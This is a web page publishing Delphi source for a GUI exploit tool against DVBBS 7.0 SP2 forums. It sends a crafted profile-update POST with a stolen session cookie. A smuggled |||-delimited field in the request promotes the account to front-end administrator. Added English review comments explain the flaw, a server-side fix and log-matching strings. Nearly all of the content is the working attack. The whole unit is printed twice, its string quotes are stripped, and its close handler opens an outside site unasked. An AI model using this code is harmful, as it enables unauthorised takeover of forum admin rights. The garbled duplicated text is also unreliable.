DVBBS7.0Sp2前臺提權漏洞利用程序[Kendy版]源碼
更新時間:2007年01月16日 00:00:00 作者:
作者:Kendy 文章來源:Kendys Blog
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ScktComp, StdCtrls, ComCtrls, WinSkinData, ShellApi;
type
// Single form of the tool. The published component fields below are bound to
// the .dfm resource pulled in by {$R *.dfm}, so their names and types are
// left exactly as declared.
TForm1 = class(TForm)
Label1: TLabel;
Label2: TLabel;
Label3: TLabel;
// Edit1: forum address; Edit2: forum account name; Edit3: a captured session
// cookie. Button1Click reads all three and refuses to run when one is empty.
Edit1: TEdit;
Edit2: TEdit;
Edit3: TEdit;
Button1: TButton;
// Raw TCP client used to send the hand-built HTTP request (see the handlers).
ClientSocket1: TClientSocket;
GroupBox1: TGroupBox;
// Memo1 shows the server response text; Label4 and StatusBar1 show the verdict.
Memo1: TMemo;
Label4: TLabel;
StatusBar1: TStatusBar;
// Skin component from the WinSkinData unit named in the uses clause.
SkinData1: TSkinData;
procedure Button1Click(Sender: TObject);
procedure ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
// Unit-level buffer holding the complete HTTP request. Button1Click fills it
// and ClientSocket1Connect sends it once the connection is up.
Data: string;
implementation
{$R *.dfm}
// Builds one HTTP POST to the forum's mymodify.asp profile-update page from
// the three input fields, stores it in the unit-level Data buffer, and opens
// the socket; the request is sent from ClientSocket1Connect.
// NOTE(review): on this page the quote characters around string literals have
// been lost (e.g. "if edit1.Text = then"), so the code is kept exactly as
// published and only commented.
procedure TForm1.Button1Click(Sender: TObject);
var
sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;
i:integer;
begin
ClientSocket1.Close ;
// Input validation: each field must be filled in. The status-bar messages
// ask for the forum address, the forum account and the captured cookie.
if edit1.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入論壇地址!;
exit;
end;
if edit2.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入你的論壇賬號!;
exit;
end;
if edit3.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入抓取的Cookie!;
exit;
end;
// Clear the output controls left over from a previous run.
memo1.Text :=;
StatusBar1.Panels[0].Text :=;
Label4.Caption :=;
// Drop a leading scheme from the address; only plain HTTP is handled.
sUrl:=edit1.Text ;
if Pos(http://,sUrl) <> 0 then
sUrl:=StringReplace(sUrl,http://,,[rfIgnoreCase]);
sUsername:=edit2.Text ;
sCookie:=edit3.Text ;
//--------Host-------------
// Host is the part of the address before the first slash, or the whole
// address when it contains none.
i:=Pos(/,sUrl);
if i <> 0 then
sHost:=Copy(sUrl,0,i-1)
else
sHost:=sUrl;
//--------Referer-----------
// The Referer names the same profile page on the target forum.
sReferer:=http:// + sUrl + /mymodify.asp;
//--------POST--------------
// Request path: the address with the host removed, then mymodify.asp with the
// account name from Edit2 appended to the query string as typed.
sPost:=StringReplace(sUrl,sHost,,[rfIgnoreCase]);
sPost:=sPost + /mymodify.asp?action=updat&username= + sUsername;
//--------request body------------
// Ordinary profile fields (sex, face, birthday, ...) plus a myface value that
// carries a long |||-separated tail: numbers, dates, a group title meaning
// "administrator", level10.gif and more.
// NOTE(review): presumably the forum keeps these user fields in one
// |||-delimited record, so a submitted value that contains the delimiter ends
// up setting fields the user should not control - confirm against the server
// code. The server-side fix is to reject or encode the delimiter in every
// submitted profile value and never to take group or level data from the form.
// The constants below (210.41.235.200, 9pc722664t5w7IM7, the fixed dates) are
// the same on every run, which makes them usable as match strings when
// searching request logs or writing an IDS rule for this tool.
S:=sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%;
S:=S+2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理員|||1||||||120|||115|||28|||0||||||210.41.235.200|||;
S:=S+0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||Dvbbs&width=100&height=100;
S:=S+&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo;
S:=S+=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0;
S:=S+&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0;
// Request line and headers, each terminated with CR LF (#13#10). Everything
// except Referer, Host and Cookie is a fixed string: the Accept list, the
// User-Agent and the Content-Length of 585 do not vary with the input, so
// the header set is a stable fingerprint of this tool.
Data:=POST +sPost+ HTTP/1.1+#13#10;
Data:=Data+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*+#13#10;
Data:=Data+Referer: +sReferer+#13#10;
Data:=Data+Accept-Language: zh-cn+#13#10;
Data:=Data+Content-Type: application/x-www-form-urlencoded+#13#10;
Data:=Data+Accept-Encoding: gzip, deflate+#13#10;
Data:=Data+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; TencentTraveler )+#13#10;
Data:=Data+Host: +sHost+#13#10;
Data:=Data+Content-Length: 585+#13#10;
Data:=Data+Connection: Keep-Alive+#13#10;
Data:=Data+Cache-Control: no-cache+#13#10;
// The cookie from Edit3 is sent verbatim; the blank line ends the headers.
Data:=Data+Cookie: + sCookie+#13#10+#13#10;
Data:=Data+S;
//--------start sending the request-------------
// Port 80 is fixed. Open only starts the connection; the status text reads
// "sending data...".
ClientSocket1.Host := sHost;
ClientSocket1.Port := 80;
ClientSocket1.Open ;
StatusBar1.Panels[0].Text :=數(shù)據(jù)發(fā)送中...;
end;
// Connect handler: once the TCP connection is established, transmit the
// request text that Button1Click left in the unit-level Data buffer.
procedure TForm1.ClientSocket1Connect(Sender: TObject;
  Socket: TCustomWinSocket);
var
  Request: string;
begin
  // Work on a local copy of the prepared request; nothing is modified here.
  Request := Data;
  Socket.SendText(Request);
end;
// Read handler: shows the received text in Memo1 and reports success or
// failure depending on whether that text contains the forum's confirmation
// message ("your modified information was submitted successfully").
procedure TForm1.ClientSocket1Read(Sender: TObject;
Socket: TCustomWinSocket);
begin
// Each read event replaces the memo contents with what was just received.
// NOTE(review): the verdict is therefore based on this one chunk only; if the
// response arrives in several read events the displayed result reflects the
// last one - treat the tool's output as unreliable evidence either way.
memo1.Text :=Socket.ReceiveText ;
if Pos(您的修改信息已成功提交,memo1.Text) <> 0 then
begin
// Success text: promoted to front-end administrator; log in to the forum again.
Label4.Caption :=>>成功提升為前臺管理員!;
StatusBar1.Panels[0].Text :=成功,請重新登陸論壇!;
end
else
begin
// Failure text shown for any response without the confirmation message.
Label4.Caption :=>> Sorry,提權失敗;
StatusBar1.Panels[0].Text :=失敗,換個論壇試試。;
end;
end;
// Error handler: swallows every socket error and shows a generic message.
procedure TForm1.ClientSocket1Error(Sender: TObject;
Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
var ErrorCode: Integer);
begin
// Setting ErrorCode to 0 tells the socket component not to raise its
// exception, so the cause of the failure (ErrorEvent) is never reported.
ErrorCode:= 0;
StatusBar1.Panels[0].Text :=Error.....;
// Redundant: this is already the last statement of the handler.
Exit;
end;
// Close handler. Side effect: every time the form is closed, ShellExecute
// asks the shell to open a hard-coded web address, i.e. the tool starts the
// default browser on a third-party site without asking. Action is not touched.
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
ShellExecute(Handle,open,http://aliwy.77169.com,nil,nil,SW_SHOW);
end;
end.
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, ScktComp, StdCtrls, ComCtrls, WinSkinData, ShellApi;
type
// Single form of the tool. The published component fields below are bound to
// the .dfm resource pulled in by {$R *.dfm}, so their names and types are
// left exactly as declared.
TForm1 = class(TForm)
Label1: TLabel;
Label2: TLabel;
Label3: TLabel;
// Edit1: forum address; Edit2: forum account name; Edit3: a captured session
// cookie. Button1Click reads all three and refuses to run when one is empty.
Edit1: TEdit;
Edit2: TEdit;
Edit3: TEdit;
Button1: TButton;
// Raw TCP client used to send the hand-built HTTP request (see the handlers).
ClientSocket1: TClientSocket;
GroupBox1: TGroupBox;
// Memo1 shows the server response text; Label4 and StatusBar1 show the verdict.
Memo1: TMemo;
Label4: TLabel;
StatusBar1: TStatusBar;
// Skin component from the WinSkinData unit named in the uses clause.
SkinData1: TSkinData;
procedure Button1Click(Sender: TObject);
procedure ClientSocket1Connect(Sender: TObject;
Socket: TCustomWinSocket);
procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);
procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;
ErrorEvent: TErrorEvent; var ErrorCode: Integer);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
// Unit-level buffer holding the complete HTTP request. Button1Click fills it
// and ClientSocket1Connect sends it once the connection is up.
Data: string;
implementation
{$R *.dfm}
// Builds one HTTP POST to the forum's mymodify.asp profile-update page from
// the three input fields, stores it in the unit-level Data buffer, and opens
// the socket; the request is sent from ClientSocket1Connect.
// NOTE(review): on this page the quote characters around string literals have
// been lost (e.g. "if edit1.Text = then"), so the code is kept exactly as
// published and only commented.
procedure TForm1.Button1Click(Sender: TObject);
var
sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;
i:integer;
begin
ClientSocket1.Close ;
// Input validation: each field must be filled in. The status-bar messages
// ask for the forum address, the forum account and the captured cookie.
if edit1.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入論壇地址!;
exit;
end;
if edit2.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入你的論壇賬號!;
exit;
end;
if edit3.Text = then
begin
StatusBar1.Panels[0].Text :=請輸入抓取的Cookie!;
exit;
end;
// Clear the output controls left over from a previous run.
memo1.Text :=;
StatusBar1.Panels[0].Text :=;
Label4.Caption :=;
// Drop a leading scheme from the address; only plain HTTP is handled.
sUrl:=edit1.Text ;
if Pos(http://,sUrl) <> 0 then
sUrl:=StringReplace(sUrl,http://,,[rfIgnoreCase]);
sUsername:=edit2.Text ;
sCookie:=edit3.Text ;
//--------Host-------------
// Host is the part of the address before the first slash, or the whole
// address when it contains none.
i:=Pos(/,sUrl);
if i <> 0 then
sHost:=Copy(sUrl,0,i-1)
else
sHost:=sUrl;
//--------Referer-----------
// The Referer names the same profile page on the target forum.
sReferer:=http:// + sUrl + /mymodify.asp;
//--------POST--------------
// Request path: the address with the host removed, then mymodify.asp with the
// account name from Edit2 appended to the query string as typed.
sPost:=StringReplace(sUrl,sHost,,[rfIgnoreCase]);
sPost:=sPost + /mymodify.asp?action=updat&username= + sUsername;
//--------request body------------
// Ordinary profile fields (sex, face, birthday, ...) plus a myface value that
// carries a long |||-separated tail: numbers, dates, a group title meaning
// "administrator", level10.gif and more.
// NOTE(review): presumably the forum keeps these user fields in one
// |||-delimited record, so a submitted value that contains the delimiter ends
// up setting fields the user should not control - confirm against the server
// code. The server-side fix is to reject or encode the delimiter in every
// submitted profile value and never to take group or level data from the form.
// The constants below (210.41.235.200, 9pc722664t5w7IM7, the fixed dates) are
// the same on every run, which makes them usable as match strings when
// searching request logs or writing an IDS rule for this tool.
S:=sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%;
S:=S+2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理員|||1||||||120|||115|||28|||0||||||210.41.235.200|||;
S:=S+0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||Dvbbs&width=100&height=100;
S:=S+&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo;
S:=S+=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0;
S:=S+&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0;
// Request line and headers, each terminated with CR LF (#13#10). Everything
// except Referer, Host and Cookie is a fixed string: the Accept list, the
// User-Agent and the Content-Length of 585 do not vary with the input, so
// the header set is a stable fingerprint of this tool.
Data:=POST +sPost+ HTTP/1.1+#13#10;
Data:=Data+Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*+#13#10;
Data:=Data+Referer: +sReferer+#13#10;
Data:=Data+Accept-Language: zh-cn+#13#10;
Data:=Data+Content-Type: application/x-www-form-urlencoded+#13#10;
Data:=Data+Accept-Encoding: gzip, deflate+#13#10;
Data:=Data+User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; TencentTraveler )+#13#10;
Data:=Data+Host: +sHost+#13#10;
Data:=Data+Content-Length: 585+#13#10;
Data:=Data+Connection: Keep-Alive+#13#10;
Data:=Data+Cache-Control: no-cache+#13#10;
// The cookie from Edit3 is sent verbatim; the blank line ends the headers.
Data:=Data+Cookie: + sCookie+#13#10+#13#10;
Data:=Data+S;
//--------start sending the request-------------
// Port 80 is fixed. Open only starts the connection; the status text reads
// "sending data...".
ClientSocket1.Host := sHost;
ClientSocket1.Port := 80;
ClientSocket1.Open ;
StatusBar1.Panels[0].Text :=數(shù)據(jù)發(fā)送中...;
end;
// Connect handler: once the TCP connection is established, transmit the
// request text that Button1Click left in the unit-level Data buffer.
procedure TForm1.ClientSocket1Connect(Sender: TObject;
  Socket: TCustomWinSocket);
var
  Request: string;
begin
  // Work on a local copy of the prepared request; nothing is modified here.
  Request := Data;
  Socket.SendText(Request);
end;
// Read handler: shows the received text in Memo1 and reports success or
// failure depending on whether that text contains the forum's confirmation
// message ("your modified information was submitted successfully").
procedure TForm1.ClientSocket1Read(Sender: TObject;
Socket: TCustomWinSocket);
begin
// Each read event replaces the memo contents with what was just received.
// NOTE(review): the verdict is therefore based on this one chunk only; if the
// response arrives in several read events the displayed result reflects the
// last one - treat the tool's output as unreliable evidence either way.
memo1.Text :=Socket.ReceiveText ;
if Pos(您的修改信息已成功提交,memo1.Text) <> 0 then
begin
// Success text: promoted to front-end administrator; log in to the forum again.
Label4.Caption :=>>成功提升為前臺管理員!;
StatusBar1.Panels[0].Text :=成功,請重新登陸論壇!;
end
else
begin
// Failure text shown for any response without the confirmation message.
Label4.Caption :=>> Sorry,提權失敗;
StatusBar1.Panels[0].Text :=失敗,換個論壇試試。;
end;
end;
// Error handler: swallows every socket error and shows a generic message.
procedure TForm1.ClientSocket1Error(Sender: TObject;
Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
var ErrorCode: Integer);
begin
// Setting ErrorCode to 0 tells the socket component not to raise its
// exception, so the cause of the failure (ErrorEvent) is never reported.
ErrorCode:= 0;
StatusBar1.Panels[0].Text :=Error.....;
// Redundant: this is already the last statement of the handler.
Exit;
end;
// Close handler. Side effect: every time the form is closed, ShellExecute
// asks the shell to open a hard-coded web address, i.e. the tool starts the
// default browser on a third-party site without asking. Action is not touched.
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
ShellExecute(Handle,open,http://aliwy.77169.com,nil,nil,SW_SHOW);
end;
end.